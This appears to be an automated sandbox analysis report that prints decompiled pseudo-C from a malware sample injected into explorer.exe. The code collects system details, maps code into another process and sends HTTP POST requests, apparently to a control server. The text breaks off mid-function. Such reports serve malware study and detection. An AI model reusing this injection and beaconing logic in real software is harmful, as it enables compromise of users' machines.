                                                                                                            				char _v8;
                                                                                                            				char _v12;
                                                                                                            				char _v16;
                                                                                                            				char _v144;
                                                                                                            				char _v656;
                                                                                                            				char _v668;
                                                                                                            				char _v2644;
                                                                                                            				void* __esi;
                                                                                                            				struct _OSVERSIONINFOA* _t68;
                                                                                                            				intOrPtr _t70;
                                                                                                            				void* _t71;
                                                                                                            				intOrPtr _t73;
                                                                                                            				void* _t74;
                                                                                                            				intOrPtr _t75;
                                                                                                            				intOrPtr* _t77;
                                                                                                            				intOrPtr _t79;
                                                                                                            				intOrPtr _t87;
                                                                                                            				intOrPtr _t89;
                                                                                                            				void* _t90;
                                                                                                            				intOrPtr _t92;
                                                                                                            				void* _t93;
                                                                                                            				void* _t97;
                                                                                                            				intOrPtr _t99;
                                                                                                            				short _t106;
                                                                                                            				char _t108;
                                                                                                            				intOrPtr _t113;
                                                                                                            				intOrPtr _t116;
                                                                                                            				intOrPtr _t119;
                                                                                                            				intOrPtr _t123;
                                                                                                            				intOrPtr _t136;
                                                                                                            				intOrPtr _t138;
                                                                                                            				intOrPtr _t141;
                                                                                                            				intOrPtr _t143;
                                                                                                            				intOrPtr _t148;
                                                                                                            				void* _t149;
                                                                                                            				WCHAR* _t150;
                                                                                                            				char* _t151;
                                                                                                            				intOrPtr _t162;
                                                                                                            				intOrPtr _t177;
                                                                                                            				void* _t191;
                                                                                                            				struct _OSVERSIONINFOA* _t192;
                                                                                                            				void* _t193;
                                                                                                            				void* _t195;
                                                                                                            				char _t198;
                                                                                                            				void* _t199;
                                                                                                            				char* _t200;
                                                                                                            				void* _t203;
                                                                                                            				int* _t204;
                                                                                                            				void* _t216;
                                                                                                            
                                                                                                            				_t216 = __fp0;
                                                                                                            				_t148 =  *0x32ff8f8; // 0x32e0000
                                                                                                            				_t68 = E032E8D70(0x1ac4);
                                                                                                            				_t192 = _t68;
                                                                                                            				if(_t192 != 0) {
                                                                                                            					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
                                                                                                            					_t70 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
                                                                                                            					_t3 = _t192 + 0x648; // 0x648
                                                                                                            					E032F35C6( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
                                                                                                            					_t73 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_t5 = _t192 + 0x1644; // 0x1644
                                                                                                            					_t194 = _t5;
                                                                                                            					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
                                                                                                            					_t207 = _t74;
                                                                                                            					if(_t74 != 0) {
                                                                                                            						 *((intOrPtr*)(_t192 + 0x1854)) = E032E9790(_t194, _t207);
                                                                                                            					}
                                                                                                            					_t75 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_t77 = E032ECA1B( *((intOrPtr*)(_t75 + 0x12c))());
                                                                                                            					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
                                                                                                            					_t159 =  *_t77;
                                                                                                            					if(E032ECB96( *_t77) == 0) {
                                                                                                            						_t79 = E032ECA6B(_t159, _t194);
                                                                                                            						__eflags = _t79;
                                                                                                            						_t162 = (0 | _t79 > 0x00000000) + 1;
                                                                                                            						__eflags = _t162;
                                                                                                            						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
                                                                                                            					} else {
                                                                                                            						 *((intOrPtr*)(_t192 + 0x214)) = 3;
                                                                                                            					}
                                                                                                            					_t14 = _t192 + 0x220; // 0x220
                                                                                                            					 *((intOrPtr*)(_t192 + 0x218)) = E032EF420(_t14);
                                                                                                            					 *((intOrPtr*)(_t192 + 0x21c)) = E032EF3E5(_t14);
                                                                                                            					_t17 = _t192 + 0x114; // 0x114
                                                                                                            					_t195 = _t17;
                                                                                                            					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
                                                                                                            					_push( &_v16);
                                                                                                            					_v12 = 0x80;
                                                                                                            					_push( &_v8);
                                                                                                            					_v8 = 0x100;
                                                                                                            					_push( &_v656);
                                                                                                            					_push( &_v12);
                                                                                                            					_push(_t195);
                                                                                                            					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
                                                                                                            					_t87 =  *0x32ff8e8; // 0x52ef8b8
                                                                                                            					_push(0);
                                                                                                            					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
                                                                                                            						GetLastError();
                                                                                                            					}
                                                                                                            					_t89 =  *0x32ff8f0; // 0x52ef838
                                                                                                            					_t90 =  *((intOrPtr*)(_t89 + 0x3c))(0x1000);
                                                                                                            					_t28 = _t192 + 0x228; // 0x228
                                                                                                            					_t149 = _t28;
                                                                                                            					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
                                                                                                            					E032EE039(_t149);
                                                                                                            					_t211 = _t149;
                                                                                                            					if(_t149 != 0) {
                                                                                                            						 *((intOrPtr*)(_t192 + 0x434)) = E032E9790(_t149, _t211);
                                                                                                            					}
                                                                                                            					_t92 = E032EC86B();
                                                                                                            					_t33 = _t192 + 0xb0; // 0xb0
                                                                                                            					_t196 = _t33;
                                                                                                            					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
                                                                                                            					_t93 = E032EC65E(_t92, _t33, _t211, _t216);
                                                                                                            					_t35 = _t192 + 0xd0; // 0xd0
                                                                                                            					E032E9B7C(_t93, _t33, _t35);
                                                                                                            					_t36 = _t192 + 0x438; // 0x438
                                                                                                            					E032E97AA(_t149, _t36);
                                                                                                            					_t97 = E032EE3C8(_t196, E032EA5DA(_t33), 0);
                                                                                                            					_t37 = _t192 + 0x100c; // 0x100c
                                                                                                            					E032EC881(_t97, _t37, _t216);
                                                                                                            					_t99 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					 *((intOrPtr*)(_t192 + 0x101c)) = E032ECBE8( *((intOrPtr*)(_t99 + 0x12c))(_t195));
                                                                                                            					E032E8F0A(_t192, 0, 0x9c);
                                                                                                            					_t204 = _t203 + 0xc;
                                                                                                            					_t192->dwOSVersionInfoSize = 0x9c;
                                                                                                            					GetVersionExA(_t192);
                                                                                                            					 *((intOrPtr*)(_t192 + 0xa8)) = E032EDE3C(_t100);
                                                                                                            					_t106 = E032EDE65(_t105);
                                                                                                            					_t41 = _t192 + 0x1020; // 0x1020
                                                                                                            					_t150 = _t41;
                                                                                                            					 *((short*)(_t192 + 0x9c)) = _t106;
                                                                                                            					GetWindowsDirectoryW(_t150, 0x104);
                                                                                                            					_t108 = E032E9F8F(_t105, 0x7c4);
                                                                                                            					_t177 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_t198 = _t108;
                                                                                                            					 *_t204 = 0x104;
                                                                                                            					_push( &_v668);
                                                                                                            					_push(_t198);
                                                                                                            					_v8 = _t198;
                                                                                                            					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
                                                                                                            						_t143 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
                                                                                                            					}
                                                                                                            					E032E8D41( &_v8);
                                                                                                            					_t113 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_t48 = _t192 + 0x1434; // 0x1434
                                                                                                            					_t199 = _t48;
                                                                                                            					 *_t204 = 0x209;
                                                                                                            					_push(_t199);
                                                                                                            					_push(L"USERPROFILE");
                                                                                                            					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
                                                                                                            						E032E9FEE(_t199, 0x105, L"%s\\%s", _t150);
                                                                                                            						_t141 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            						_t204 =  &(_t204[5]);
                                                                                                            						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
                                                                                                            					}
                                                                                                            					_push(0x20a);
                                                                                                            					_t51 = _t192 + 0x122a; // 0x122a
                                                                                                            					_t151 = L"TEMP";
                                                                                                            					_t116 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_push(_t151);
                                                                                                            					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
                                                                                                            						_t138 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
                                                                                                            					}
                                                                                                            					_push(0x40);
                                                                                                            					_t200 = L"SystemDrive";
                                                                                                            					_push( &_v144);
                                                                                                            					_t119 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_push(_t200);
                                                                                                            					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
                                                                                                            						_t136 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
                                                                                                            					}
                                                                                                            					_v8 = 0x7f;
                                                                                                            					_t59 = _t192 + 0x199c; // 0x199c
                                                                                                            					_t123 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
                                                                                                            					_t62 = _t192 + 0x100c; // 0x100c
                                                                                                            					E032F35C6(E032EE3C8(_t62, E032EA5DA(_t62), 0),  &_v2644);
                                                                                                            					_t63 = _t192 + 0x1858; // 0x1858
                                                                                                            					E032F3598( &_v2644, _t63, 0x20);
                                                                                                            					_push( &_v2644);
                                                                                                            					_push(0x1e);
                                                                                                            					_t66 = _t192 + 0x1878; // 0x1878
                                                                                                            					_t191 = 0x14;
                                                                                                            					E032E9877(_t66, _t191);
                                                                                                            					 *((intOrPtr*)(_t192 + 0x1898)) = E032EDBE6(_t191);
                                                                                                            					return _t192;
                                                                                                            				}
                                                                                                            				return _t68;
                                                                                                            			}


                                                                                                            APIs
                                                                                                              • Part of subcall function 032E8D70: RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 032EE067
                                                                                                            • GetLastError.KERNEL32 ref: 032EE161
                                                                                                            • GetVersionExA.KERNEL32(00000000), ref: 032EE226
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 032EE251
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCurrentDirectoryErrorHeapLastProcessVersionWindows
                                                                                                            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                            • API String ID: 3743117707-2706916422
                                                                                                            • Opcode ID: 54d5036cefcbff1c778cf86e14d5f5ec1c9873bc5b855a05b6cb664d8759563b
                                                                                                            • Instruction ID: fe2e6347b8eaf31471e02281484c914ccfcf77994cd7bd610efaf1e3918d043a
                                                                                                            • Opcode Fuzzy Hash: 54d5036cefcbff1c778cf86e14d5f5ec1c9873bc5b855a05b6cb664d8759563b
                                                                                                            • Instruction Fuzzy Hash: 2B918E75710605AFD704FBB0E849FEAB7A8FF08700F444179E519DB240EBB4AA948BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E032ED54A(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                            				struct HINSTANCE__* _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				char _v16;
                                                                                                            				char _v20;
                                                                                                            				char _v24;
                                                                                                            				struct HINSTANCE__* _v28;
                                                                                                            				short _v32;
                                                                                                            				char _v36;
                                                                                                            				intOrPtr* _v40;
                                                                                                            				intOrPtr _v44;
                                                                                                            				struct HINSTANCE__* _v48;
                                                                                                            				char _v52;
                                                                                                            				struct HINSTANCE__* _v53;
                                                                                                            				char _v64;
                                                                                                            				short _v68;
                                                                                                            				struct _WNDCLASSEXA _v116;
                                                                                                            				char _t81;
                                                                                                            				intOrPtr* _t83;
                                                                                                            				intOrPtr _t85;
                                                                                                            				intOrPtr _t87;
                                                                                                            				intOrPtr _t90;
                                                                                                            				intOrPtr _t95;
                                                                                                            				char _t97;
                                                                                                            				short _t98;
                                                                                                            				intOrPtr _t105;
                                                                                                            				void* _t107;
                                                                                                            				intOrPtr _t110;
                                                                                                            				intOrPtr _t113;
                                                                                                            				char _t119;
                                                                                                            				void* _t124;
                                                                                                            				struct HWND__* _t132;
                                                                                                            				struct HINSTANCE__* _t138;
                                                                                                            				intOrPtr _t145;
                                                                                                            				void* _t147;
                                                                                                            				char _t154;
                                                                                                            				intOrPtr _t155;
                                                                                                            				intOrPtr _t157;
                                                                                                            				intOrPtr _t158;
                                                                                                            				intOrPtr _t160;
                                                                                                            				intOrPtr _t162;
                                                                                                            				char _t163;
                                                                                                            				void* _t165;
                                                                                                            
                                                                                                            				_t81 =  *0x32ff8e4; // 0x3310000
                                                                                                            				_t138 = 0;
                                                                                                            				_v12 = __ecx;
                                                                                                            				_t157 = __edx;
                                                                                                            				_v20 = 0;
                                                                                                            				_v52 = 0;
                                                                                                            				_v48 = 0;
                                                                                                            				_v16 = 0;
                                                                                                            				_v8 = 0;
                                                                                                            				_v24 = 0;
                                                                                                            				_v44 = __edx;
                                                                                                            				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
                                                                                                            					E032EF1DB(0x1f4);
                                                                                                            				}
                                                                                                            				_t12 = _t157 + 0x3c; // 0x852c50ff
                                                                                                            				_t83 =  *_t12 + _t157;
                                                                                                            				_v28 = _t138;
                                                                                                            				_v40 = _t83;
                                                                                                            				if( *_t83 != 0x4550) {
                                                                                                            					L14:
                                                                                                            					_t158 = _v12;
                                                                                                            					L15:
                                                                                                            					if(_v8 != _t138) {
                                                                                                            						_t90 =  *0x32ff9e0; // 0x0
                                                                                                            						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
                                                                                                            						_v8 = _t138;
                                                                                                            					}
                                                                                                            					L17:
                                                                                                            					if(_v16 != 0) {
                                                                                                            						_t87 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            						_t160 =  *0x32ff9e0; // 0x0
                                                                                                            						 *((intOrPtr*)(_t160 + 0x10))( *((intOrPtr*)(_t87 + 0x12c))(_v16));
                                                                                                            					}
                                                                                                            					if(_v20 != 0) {
                                                                                                            						_t85 =  *0x32ff9e0; // 0x0
                                                                                                            						 *((intOrPtr*)(_t85 + 0x20))(_v20);
                                                                                                            					}
                                                                                                            					return _v8;
                                                                                                            				}
                                                                                                            				_push(_t138);
                                                                                                            				_push(0x8000000);
                                                                                                            				_v52 =  *((intOrPtr*)(_t83 + 0x50));
                                                                                                            				_push(0x40);
                                                                                                            				_push( &_v52);
                                                                                                            				_push(_t138);
                                                                                                            				_push(0xe);
                                                                                                            				_push( &_v20);
                                                                                                            				_t95 =  *0x32ff9e0; // 0x0
                                                                                                            				if( *((intOrPtr*)(_t95 + 0xc))() < 0) {
                                                                                                            					goto L14;
                                                                                                            				}
                                                                                                            				_t97 =  *"18293"; // 0x39323831
                                                                                                            				_v36 = _t97;
                                                                                                            				_t98 =  *0x32fce70; // 0x33
                                                                                                            				_v32 = _t98;
                                                                                                            				_v116.lpszClassName =  &_v64;
                                                                                                            				asm("movsd");
                                                                                                            				_v116.lpfnWndProc = DefWindowProcW;
                                                                                                            				_v116.cbWndExtra = _t138;
                                                                                                            				asm("movsd");
                                                                                                            				_v116.style = 0xb;
                                                                                                            				_v116.lpszMenuName = _t138;
                                                                                                            				_v116.cbSize = 0x30;
                                                                                                            				asm("movsb");
                                                                                                            				_v116.cbClsExtra = _t138;
                                                                                                            				_v116.hInstance = _t138;
                                                                                                            				if(RegisterClassExA( &_v116) != 0) {
                                                                                                            					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
                                                                                                            					if(_t132 != 0) {
                                                                                                            						DestroyWindow(_t132);
                                                                                                            						UnregisterClassA( &_v64, _t138);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t162 =  *0x32ff9e0; // 0x0
                                                                                                            				_t105 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            				_t107 =  *((intOrPtr*)(_t162 + 0x14))(_v20,  *((intOrPtr*)(_t105 + 0x12c))( &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40));
                                                                                                            				_t158 = _v12;
                                                                                                            				if(_t107 < 0) {
                                                                                                            					goto L15;
                                                                                                            				} else {
                                                                                                            					_push(0x40);
                                                                                                            					_push(_t138);
                                                                                                            					_push(2);
                                                                                                            					_push( &_v24);
                                                                                                            					_push(_t138);
                                                                                                            					_push(_t138);
                                                                                                            					_push(_t138);
                                                                                                            					_push( &_v8);
                                                                                                            					_t110 =  *0x32ff9e0; // 0x0
                                                                                                            					_push(_t158);
                                                                                                            					_push(_v20);
                                                                                                            					if( *((intOrPtr*)(_t110 + 0x14))() < 0) {
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					_t154 = E032E8DD5( *0x32ff8e4, 0x1ac4);
                                                                                                            					_v36 = _t154;
                                                                                                            					if(_t154 == 0) {
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
                                                                                                            					_t113 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_t163 =  *((intOrPtr*)(_t113 + 0x54))(_t158, _t138, 0x1ac4, 0x1000, 4);
                                                                                                            					_t145 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					 *((intOrPtr*)(_t145 + 0x20))(_v12, _t163, _t154, 0x1ac4,  &_v28);
                                                                                                            					E032E8D86( &_v36, 0x1ac4);
                                                                                                            					_t119 =  *0x32ff8e4; // 0x3310000
                                                                                                            					_t155 =  *0x32ff8f8; // 0x32e0000
                                                                                                            					_v36 = _t119;
                                                                                                            					 *0x32ff8f8 = _v8;
                                                                                                            					 *0x32ff8e4 = _t163;
                                                                                                            					E032E8E4D(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
                                                                                                            					E032ED4C9(_v16, _v8, _v44);
                                                                                                            					_t124 = E032EA5DA("Jjischug");
                                                                                                            					_v53 = _t138;
                                                                                                            					_t147 = 0xf;
                                                                                                            					if(_t124 > _t147) {
                                                                                                            						do {
                                                                                                            							L12:
                                                                                                            							_t63 = _t138 + 0x41; // 0x41
                                                                                                            							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
                                                                                                            							_t138 =  &(_t138->i);
                                                                                                            						} while (_t138 < _t147);
                                                                                                            						L13:
                                                                                                            						lstrlenW( &_v68);
                                                                                                            						 *0x32ff8f8 = _t155;
                                                                                                            						 *0x32ff8e4 = _v36;
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					_t147 = _t124;
                                                                                                            					if(_t147 == 0) {
                                                                                                            						goto L13;
                                                                                                            					}
                                                                                                            					goto L12;
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • RegisterClassExA.USER32(?), ref: 032ED610
                                                                                                            • CreateWindowExA.USER32 ref: 032ED63B
                                                                                                            • DestroyWindow.USER32(00000000), ref: 032ED646
                                                                                                            • UnregisterClassA.USER32 ref: 032ED651
                                                                                                              • Part of subcall function 032E8D86: RtlFreeHeap.NTDLL(00000000,00000000), ref: 032E8DCC
                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,032E623D), ref: 032ED77B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ClassWindow$CreateDestroyFreeHeapRegisterUnregisterlstrlen
                                                                                                            • String ID: 0$18293$Jjischug$aeroflot
                                                                                                            • API String ID: 1751977465-3772587274
                                                                                                            • Opcode ID: 16221df3c097a91e73b9bc2fa8caf4754c93ce422a46a29bd495f3fb7d646abd
                                                                                                            • Instruction ID: 204c2f4d74a26715566da32c34798d653f9ec477229faedc52900b159de761dc
                                                                                                            • Opcode Fuzzy Hash: 16221df3c097a91e73b9bc2fa8caf4754c93ce422a46a29bd495f3fb7d646abd
                                                                                                            • Instruction Fuzzy Hash: C0815AB5A10219BFDB00EF94E989EEEBBF8FB08714F14406AE604E7250D7709940CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 30%
                                                                                                            			E032F296E(intOrPtr* _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                            				char _v16;
                                                                                                            				_Unknown_base(*)()* _t15;
                                                                                                            				void* _t20;
                                                                                                            				intOrPtr* _t25;
                                                                                                            				intOrPtr* _t29;
                                                                                                            				struct HINSTANCE__* _t30;
                                                                                                            
                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                            				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                                                            				if(_t30 == 0) {
                                                                                                            					L7:
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                                                            				if(_t25 == 0) {
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                                                            				_v12 = _t15;
                                                                                                            				if(_t15 == 0) {
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                                                            				if(_t29 == 0) {
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				_push(0xf0000000);
                                                                                                            				_push(1);
                                                                                                            				_push(0);
                                                                                                            				_push(0);
                                                                                                            				_push( &_v8);
                                                                                                            				if( *_t25() == 0) {
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				_t20 = _v12(_v8, 4,  &_v16);
                                                                                                            				 *_t29(_v8, 0);
                                                                                                            				if(_t20 == 0) {
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				 *_a4 = E032F28C9( &_v16);
                                                                                                            				return 0;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,032E7C2B), ref: 032F2980
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 032F2998
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 032F29A6
                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 032F29B5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                            • API String ID: 667068680-129414566
                                                                                                            • Opcode ID: f84976287738dbbf8031c57d9dc468bdb29dd62723af03591f9e58abed27c39a
                                                                                                            • Instruction ID: b78e14f59a000fc306caeb7752672c955440eccab7a768edb2418e2b57ab711d
                                                                                                            • Opcode Fuzzy Hash: f84976287738dbbf8031c57d9dc468bdb29dd62723af03591f9e58abed27c39a
                                                                                                            • Instruction Fuzzy Hash: 8711E53AA6031AFFDB61EAB49C45F9EF7AC9F85610F250570EB00F3140DBB0DA809664
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E032EF823(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				char _v16;
                                                                                                            				char _v20;
                                                                                                            				char _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				int _v32;
                                                                                                            				signed int _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				intOrPtr _v44;
                                                                                                            				intOrPtr _v48;
                                                                                                            				intOrPtr _v52;
                                                                                                            				char _v56;
                                                                                                            				int _v68;
                                                                                                            				void* _v72;
                                                                                                            				intOrPtr _v92;
                                                                                                            				int _v96;
                                                                                                            				void* _v100;
                                                                                                            				intOrPtr _v104;
                                                                                                            				intOrPtr _v108;
                                                                                                            				char* _v112;
                                                                                                            				char _v116;
                                                                                                            				char _v132;
                                                                                                            				void _v388;
                                                                                                            				void _v644;
                                                                                                            				intOrPtr _t93;
                                                                                                            				intOrPtr _t94;
                                                                                                            				intOrPtr _t102;
                                                                                                            				signed int _t104;
                                                                                                            				intOrPtr* _t105;
                                                                                                            				intOrPtr _t110;
                                                                                                            				signed int _t111;
                                                                                                            				signed int _t112;
                                                                                                            				intOrPtr _t115;
                                                                                                            				signed int _t116;
                                                                                                            				char _t117;
                                                                                                            				intOrPtr _t119;
                                                                                                            				char _t122;
                                                                                                            				intOrPtr _t127;
                                                                                                            				signed int _t129;
                                                                                                            				intOrPtr _t135;
                                                                                                            				intOrPtr _t139;
                                                                                                            				intOrPtr _t143;
                                                                                                            				intOrPtr _t145;
                                                                                                            				intOrPtr _t147;
                                                                                                            				intOrPtr _t153;
                                                                                                            				intOrPtr _t155;
                                                                                                            				intOrPtr _t159;
                                                                                                            				void* _t163;
                                                                                                            				signed int _t165;
                                                                                                            				void* _t170;
                                                                                                            				intOrPtr _t179;
                                                                                                            				signed int _t186;
                                                                                                            				char _t188;
                                                                                                            				signed int _t189;
                                                                                                            				void* _t190;
                                                                                                            				char _t193;
                                                                                                            				signed int _t194;
                                                                                                            				signed int _t195;
                                                                                                            				void* _t196;
                                                                                                            
                                                                                                            				_v24 = 4;
                                                                                                            				_v32 = 0;
                                                                                                            				_v28 = 1;
                                                                                                            				_t190 = __edx;
                                                                                                            				memset( &_v388, 0, 0x100);
                                                                                                            				memset( &_v644, 0, 0x100);
                                                                                                            				_v56 = E032E9F75(0xab3);
                                                                                                            				_v52 = E032E9F75(0x3f9);
                                                                                                            				_v48 = E032E9F75(0x40f);
                                                                                                            				_t93 = E032E9F75(0x1eb);
                                                                                                            				_t170 = 0x58;
                                                                                                            				_v44 = _t93;
                                                                                                            				_t94 = E032E9F75(_t170);
                                                                                                            				_v36 = _v36 & 0;
                                                                                                            				_t188 = 0x3c;
                                                                                                            				_v40 = _t94;
                                                                                                            				E032E8F0A( &_v116, 0, 0x100);
                                                                                                            				_v108 = 0x10;
                                                                                                            				_v112 =  &_v132;
                                                                                                            				_v116 = _t188;
                                                                                                            				_v100 =  &_v388;
                                                                                                            				_v96 = 0x100;
                                                                                                            				_v72 =  &_v644;
                                                                                                            				_push( &_v116);
                                                                                                            				_push(0);
                                                                                                            				_v68 = 0x100;
                                                                                                            				_push(E032EA5DA(_t190));
                                                                                                            				_t102 =  *0x32ff900; // 0x0
                                                                                                            				_push(_t190);
                                                                                                            				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
                                                                                                            					_t104 = 0;
                                                                                                            					__eflags = 0;
                                                                                                            					_v12 = 0;
                                                                                                            					do {
                                                                                                            						_t105 =  *0x32ff900; // 0x0
                                                                                                            						_v8 = 0x8404f700;
                                                                                                            						_t189 =  *_t105( *0x32ff9e8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
                                                                                                            						__eflags = _t189;
                                                                                                            						if(_t189 != 0) {
                                                                                                            							E032EF7BB(_t189);
                                                                                                            							_t110 =  *0x32ff900; // 0x0
                                                                                                            							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
                                                                                                            							__eflags = _a24;
                                                                                                            							_t165 = _t111;
                                                                                                            							if(_a24 != 0) {
                                                                                                            								E032EA202(_a24);
                                                                                                            							}
                                                                                                            							__eflags = _t165;
                                                                                                            							if(_t165 != 0) {
                                                                                                            								__eflags = _v104 - 4;
                                                                                                            								_t112 = 0x8484f700;
                                                                                                            								if(_v104 != 4) {
                                                                                                            									_t112 = _v8;
                                                                                                            								}
                                                                                                            								_t115 =  *0x32ff900; // 0x0
                                                                                                            								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
                                                                                                            								_v8 = _t116;
                                                                                                            								__eflags = _a24;
                                                                                                            								if(_a24 != 0) {
                                                                                                            									E032EA202(_a24);
                                                                                                            									_t116 = _v8;
                                                                                                            								}
                                                                                                            								__eflags = _t116;
                                                                                                            								if(_t116 != 0) {
                                                                                                            									__eflags = _v104 - 4;
                                                                                                            									if(_v104 == 4) {
                                                                                                            										E032EF769(_t116);
                                                                                                            									}
                                                                                                            									_t117 = E032E9F75(0xfb0);
                                                                                                            									_t193 = _t117;
                                                                                                            									_v16 = _t193;
                                                                                                            									_t119 =  *0x32ff900; // 0x0
                                                                                                            									_t194 = _v8;
                                                                                                            									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E032EA5DA(_t193), _a4, _a8);
                                                                                                            									E032E8D2E( &_v16);
                                                                                                            									__eflags = _a24;
                                                                                                            									if(_a24 != 0) {
                                                                                                            										E032EA202(_a24);
                                                                                                            									}
                                                                                                            									__eflags = _v8;
                                                                                                            									if(_v8 != 0) {
                                                                                                            										L25:
                                                                                                            										_t122 = 8;
                                                                                                            										_v24 = _t122;
